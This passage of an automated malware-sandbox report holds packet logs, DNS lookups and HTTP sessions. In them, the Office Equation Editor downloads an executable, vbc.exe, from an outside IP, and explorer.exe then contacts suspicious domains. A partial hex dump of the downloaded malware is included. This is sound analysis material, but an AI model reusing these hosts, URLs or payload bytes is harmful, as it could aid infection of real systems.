                                                            Nov 25, 2021 17:23:58.876694918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876718998 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876730919 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876753092 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876771927 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876787901 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876811981 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876827002 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876863956 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876872063 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876928091 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876944065 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.876970053 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.876996040 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.877027988 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.884777069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.884834051 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.884867907 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.884896994 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.884911060 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.884963036 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.884994984 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885004044 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885030031 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885046959 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885077953 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885102034 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885116100 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885143995 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885170937 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885185957 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885202885 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885225058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885241985 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885265112 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885288954 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885304928 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885323048 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885344982 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885366917 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885389090 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885426044 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885443926 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885467052 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885468960 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885503054 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885507107 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885530949 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885545969 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885571003 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885585070 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885606050 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885623932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885641098 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885663986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885688066 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885704994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885720015 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885742903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885768890 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885782003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885797977 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885822058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885849953 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885858059 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885884047 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885896921 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885921955 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885935068 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885961056 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.885987997 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.885989904 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886028051 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886055946 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886066914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886081934 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886106014 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886143923 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886145115 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886182070 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886203051 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886218071 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886220932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886241913 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886260986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886280060 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886301994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886333942 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886341095 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886374950 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886379004 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886403084 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886419058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886435986 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886459112 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886490107 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886496067 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886534929 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886558056 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886573076 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886605024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886611938 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886614084 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886645079 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.886656046 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886689901 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.886722088 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.994910002 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.994982958 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995021105 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995059967 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995099068 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995136976 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995141029 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995176077 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995183945 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995191097 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995196104 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995201111 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995204926 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995215893 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995253086 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995260954 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995291948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995301008 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995333910 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995335102 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995354891 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995374918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995389938 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995417118 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995450974 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995454073 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995485067 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995493889 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995536089 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995573997 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995575905 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995613098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995616913 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995651960 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995655060 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995663881 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995682001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995691061 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995717049 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995732069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995769024 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995773077 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995785952 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995810986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995830059 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.995850086 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.995882988 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.996056080 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:59.998017073 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:25:22.939870119 CET4916680192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:22.961631060 CET804916634.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:22.961735964 CET4916680192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:22.961991072 CET4916680192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:22.983649015 CET804916634.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:23.079817057 CET804916634.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:23.079860926 CET804916634.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:23.080096006 CET4916680192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:23.080245972 CET4916680192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:23.101723909 CET804916634.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:43.505387068 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:43.527364969 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:43.527461052 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:43.527704000 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:43.549518108 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:43.645796061 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:43.645840883 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 17:25:43.645931005 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:43.645975113 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 17:25:43.667624950 CET804916734.102.136.180192.168.2.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 17:25:22.871083021 CET5216753192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:25:22.928951025 CET53521678.8.8.8192.168.2.22
                                                            Nov 25, 2021 17:25:43.451653957 CET5059153192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:25:43.503045082 CET53505918.8.8.8192.168.2.22
                                                            Nov 25, 2021 17:26:03.897233963 CET5780553192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:26:04.095473051 CET53578058.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Nov 25, 2021 17:25:22.871083021 CET192.168.2.228.8.8.80xc18cStandard query (0)www.mountfrenchlodge.netA (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.451653957 CET192.168.2.228.8.8.80x9c63Standard query (0)www.cuteprofessionalscrubs.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:26:03.897233963 CET192.168.2.228.8.8.80x30e0Standard query (0)www.troddu.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Nov 25, 2021 17:25:22.928951025 CET8.8.8.8192.168.2.220xc18cNo error (0)www.mountfrenchlodge.netmountfrenchlodge.netCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:25:22.928951025 CET8.8.8.8192.168.2.220xc18cNo error (0)mountfrenchlodge.net34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.503045082 CET8.8.8.8192.168.2.220x9c63No error (0)www.cuteprofessionalscrubs.comcuteprofessionalscrubs.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.503045082 CET8.8.8.8192.168.2.220x9c63No error (0)cuteprofessionalscrubs.com34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:26:04.095473051 CET8.8.8.8192.168.2.220x30e0No error (0)www.troddu.comtroddu.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:26:04.095473051 CET8.8.8.8192.168.2.220x30e0No error (0)troddu.com162.240.31.112A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 198.46.199.153
                                                            • www.mountfrenchlodge.net
                                                            • www.cuteprofessionalscrubs.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.2249165198.46.199.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:23:57.811558008 CET0OUTGET /70007/vbc.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 198.46.199.153
                                                            Connection: Keep-Alive
                                                            Nov 25, 2021 17:23:57.931919098 CET1INHTTP/1.1 200 OK
                                                            Date: Thu, 25 Nov 2021 16:23:57 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 25 Nov 2021 02:23:58 GMT
                                                            ETag: "b4a00-5d193aabff887"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 739840
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0>[ `@ @l[O`H H.text< > `.rsrcH`@@@.relocH@B[HH!|js}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#
                                                            Nov 25, 2021 17:23:57.931982994 CET3INData Raw: 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00 06 6f 36
                                                            Data Ascii: (1{o#(2rp(3(4s5{o(8()owo6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(*:ko,o*
                                                            Nov 25, 2021 17:23:57.932010889 CET4INData Raw: 00 0a 25 02 7b 09 00 00 04 6f 53 00 00 0a 6f 54 00 00 0a 25 07 6f 55 00 00 0a 1e 58 6f 56 00 00 0a 25 07 6f 57 00 00 0a 1e 58 6f 58 00 00 0a 7d af 01 00 04 06 7b af 01 00 04 6f 2c 00 00 0a 07 6f 59 00 00 0a 07 1a 6f 5a 00 00 0a 07 1a 6f 5b 00 00
                                                            Data Ascii: %{oSoT%oUXoV%oWXoX}{o,oYoZo[s\o]{{{o^{o,{oY*x0#}s{,{o*0K{,{-*
                                                            Nov 25, 2021 17:23:57.932039022 CET5INData Raw: 0a 6f 2c 00 00 0a 02 7b 12 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 6f 6c 00 00 0a 6f 2c 00 00 0a 02 7b 13 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 16 6f 86 00 00 0a 02 7b 0d 00 00 04 6f 6d 00 00 0a 6f 2c 00 00 0a 02 7b 09 00 00 04 6f 59 00 00
                                                            Data Ascii: o,{oY{olo,{oY{o{omo,{oY{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{
                                                            Nov 25, 2021 17:23:58.049350023 CET7INData Raw: 00 00 1b 30 04 00 5b 00 00 00 06 00 00 11 02 28 9d 00 00 0a 02 03 7d 17 00 00 04 02 16 7d 18 00 00 04 02 03 6f 77 02 00 06 03 6f 78 02 00 06 5a 03 6f 76 02 00 06 03 6f 78 02 00 06 5a 73 4d 00 00 0a 28 1d 00 00 06 02 28 1c 00 00 06 28 46 00 00 0a
                                                            Data Ascii: 0[(}}owoxZovoxZsM(((Fot,o*EP0(oooC[(oooC[(oo(,!((-}}*o
                                                            Nov 25, 2021 17:23:58.049417019 CET8INData Raw: 06 07 6f f0 01 00 06 0c 28 10 01 00 06 6f 01 01 00 06 08 6f 9b 02 00 06 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 00 00 1b 30 04 00 cd 00 00 00 0f 00 00 11 02 28 9d 00 00 0a 02 03 6f 77 02 00 06 7d 1e 00 00 04 02 03 6f 76 02 00 06 7d
                                                            Data Ascii: o(oo*{!*"}!*0(ow}ov}{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,
                                                            Nov 25, 2021 17:23:58.049448013 CET10INData Raw: 00 0a 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 00 13 30 03 00 8f 00 00 00 14 00 00 11 02 28 9d 00 00 0a 02 03 72 63 02 00 70 28 bf 00 00 0a 6f c0 00 00 0a 28 3d 00 00 06 03 72 6d 02
                                                            Data Ascii: *{%*"}%*{&*"}&*0(rcp(o(=rmp(o,^r{p(o-((?+o(4(((?(>oAs(*2(>o*{**"}**0}'
                                                            Nov 25, 2021 17:23:58.049487114 CET11INData Raw: 00 04 02 73 66 00 00 0a 7d 30 00 00 04 02 7b 2f 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6c 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6d 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6a 00 00 0a 02 28 6a 00
                                                            Data Ascii: sf}0{/ok{0ok{0oloj{0omoj{0oj(j{.on{.o{.soop{.rpoq{. TsroP{.o{.os{.Qs\o{/on{/soop
                                                            Nov 25, 2021 17:23:58.049524069 CET12INData Raw: 6f 13 00 00 0a 2d e1 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 60 00 23 83 00 0a 00 00 00 00 36 02 04 6f f1 00 00 0a 28 68 00 00 06 2a 00 00 1b 30 01 00 2e 00 00 00 1b 00 00 11 02 28 62 00 00 06 6f ed 00 00 0a 0a 2b 0b 06 6f
                                                            Data Ascii: o-,o*`#6o(h*0.(bo+ooo-,o*#(f*~{4oiso*F(_,(j*Z{2,{2o*z,{6,{6o(*2
                                                            Nov 25, 2021 17:23:58.049561977 CET14INData Raw: 54 01 00 00 20 f1 00 00 00 73 72 00 00 0a 28 95 00 00 0a 02 28 2c 00 00 0a 02 7b 45 00 00 04 6f 59 00 00 0a 02 1c 28 96 00 00 0a 02 72 4d 03 00 70 28 71 00 00 0a 02 72 65 03 00 70 6f 78 00 00 0a 02 02 fe 06 85 00 00 06 73 5c 00 00 0a 28 06 01 00
                                                            Data Ascii: T sr((,{EoY(rMp(qrepoxs\((*(*{Q*}Q({U{Q.+o*F{bo(*J{b(o*F{Xoo*6{Xo*F{Yoo*6{Yo
                                                            Nov 25, 2021 17:23:58.049599886 CET15INData Raw: 00 00 04 02 7b 5c 00 00 04 6f 6b 00 00 0a 02 7b 5d 00 00 04 6f 6b 00 00 0a 02 7b 62 00 00 04 6f 6b 00 00 0a 02 28 6a 00 00 0a 02 7b 54 00 00 04 17 6f 8e 00 00 0a 02 7b 54 00 00 04 1f 0f 1f 0c 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 54 00 00 04 72 79
                                                            Data Ascii: {\ok{]ok{bok(j{To{Tsoop{Trypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
